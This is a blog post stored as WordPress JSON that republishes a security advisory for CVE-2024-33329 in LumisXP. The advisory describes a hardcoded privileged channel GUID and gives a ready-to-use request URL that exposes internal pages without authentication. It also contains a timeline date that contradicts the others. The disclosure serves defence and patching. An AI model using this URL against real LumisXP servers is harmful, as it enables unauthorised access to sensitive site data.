{"id":58135,"date":"2024-07-11T18:10:05","date_gmt":"2024-07-11T15:10:05","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/179503\/TSI-ADV062024-CVE-2024-33329.txt"},"modified":"2024-07-11T18:10:05","modified_gmt":"2024-07-11T15:10:05","slug":"lumisxp-16-1-x-hardcoded-credentials-idor","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/lumisxp-16-1-x-hardcoded-credentials-idor\/","title":{"rendered":"LumisXP 16.1.x Hardcoded Credentials \/ IDOR"},"content":{"rendered":"<p>=====[ Tempest Security Intelligence &#8211; ADV-6\/2024<br \/>]==========================<\/p>\n<p>LumisXP v15.0.x to v16.1.x<\/p>\n<p>Author: Rodolfo Tavares<\/p>\n<p>Tempest Security Intelligence &#8211; Recife, Pernambuco &#8211; Brazil<\/p>\n<p>=====[ Table of Contents]==================================================<\/p>\n<p>Overview<br \/>Detailed description<br \/>Timeline of disclosure<br \/>Thanks &amp; Acknowledgements<br \/>References<br \/>=====[ Vulnerability<br \/>Information]=============================================<\/p>\n<p>Class: Use of Hard-coded Credentials<br \/>(&#8216;Use of Hard-coded Credentials&#8217;) [CWE-798]CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:L\/I:N\/A:N &#8211; 5.3<br \/>=====[ Overview]========================================================<\/p>\n<p>System affected : LumisXP<br \/>Software Version : Version &#8211; v15.0.x to v16.1.x<br \/>Impacts :<br \/>Vulnerability: A hardcoded privileged ID within Lumisxp v15.0.x to v16.1.x<br \/>allows attackers to bypass authentication and access internal pages and<br \/>other sensitive information<br \/>=====[ Detailed<br \/>description]=================================================<\/p>\n<p>IDOR<br \/>http:\/\/localhost.com\/main.jsp?lumChannelId=00000000F00000000000000000000002&amp;lumPageId=LumisBlankPage&amp;lumRTI=lumis.service.doui.selectstructureelement.selectPage&amp;pageId=<br \/>:<br \/>Access the link by inserting the GUID into the lumChannelId= parameter.<br \/>1 &#8211; Access your target using the following GUID (<br \/>00000000F00000000000000000000002 )<br \/>&#8220;`<br \/>http:\/\/localhost.com\/main.jsp?lumChannelId=00000000F00000000000000000000002&amp;lumPageId=LumisBlankPage&amp;lumRTI=lumis.service.doui.selectstructureelement.selectPage&amp;pageId=<br \/>&#8220;`<br \/>2 &#8211; Verify that in the request response you will have access to various<br \/>component information and internal information about one or several domains.<\/p>\n<p>=====[ Timeline of<br \/>disclosure]===============================================<\/p>\n<p>2\/Apr\/2024 &#8211; Responsible disclosure was initiated with the vendor.<br \/>12\/Apr\/2024 &#8211; LumisXP Support confirmed the issue;<br \/>16\/Fev\/2024 &#8211; The vendor fixed the vulnerability<br \/>29\/May\/2024 &#8211; CVEs was assigned and reserved as CVE-2024-33329<\/p>\n<p>=====[ Thanks &amp; Acknowledgements]========================================<\/p>\n<p>Tempest Security Intelligence [1]Rodolfo Tavares<br \/>Niklas Correa<br \/>=====[ References ]=====================================================<\/p>\n[1][ https:\/\/cwe.mitre.org\/data\/definitions\/798.html<br \/>[2][ https:\/\/www.tempest.com.br][3][Thanks Filipe X.]\n<p>=====[ EOF ]===========================================================<\/p>\n<p>&#8212;<\/p>\n<p>&#8212; <\/p>\n<p>*Esta mensagem \u00e9 para uso exclusivo de seu destinat\u00e1rio e pode conter <br \/>informa\u00e7\u00f5es privilegiadas e confidenciais. Todas as informa\u00e7\u00f5es aqui <br \/>contidas devem ser tratadas como confidenciais e n\u00e3o devem ser divulgadas a <br \/>terceiros sem o pr\u00e9vio consentimento por escrito da Tempest. Se voc\u00ea n\u00e3o \u00e9 <br \/>o destinat\u00e1rio n\u00e3o deve distribuir, copiar ou arquivar a mensagem. Neste <br \/>caso, por favor, notifique o remetente da mesma e destrua imediatamente a <br \/>mensagem.*<\/p>\n<p>*<br \/>*<br \/>*This message is intended solely for the use of its <br \/>addressee and may contain privileged or confidential information. All <br \/>information contained herein shall be treated as confidential and shall not <br \/>be disclosed to any third party without Tempest\u2019s prior written approval. <br \/>If you are not the addressee you should not distribute, copy or file this <br \/>message. In this case, please notify the sender and destroy its contents <br \/>immediately.**<br \/>*<br \/>*<br \/>*<\/p>\n","protected":false},"excerpt":{"rendered":"<p>=====[ Tempest Security Intelligence &#8211; ADV-6\/2024]========================== LumisXP v15.0.x to v16.1.x Author: Rodolfo Tavares Tempest Security Intelligence &#8211; Recife, Pernambuco &#8211; Brazil =====[ Table of Contents]================================================== OverviewDetailed descriptionTimeline of disclosureThanks &amp; AcknowledgementsReferences=====[ VulnerabilityInformation]============================================= Class: Use of Hard-coded Credentials(&#8216;Use of Hard-coded Credentials&#8217;) [CWE-798]CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:L\/I:N\/A:N &#8211; 5.3=====[ Overview]======================================================== System affected : LumisXPSoftware Version : Version &#8211; v15.0.x to v16.1.xImpacts &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-58135","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58135","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=58135"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58135\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=58135"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=58135"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=58135"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}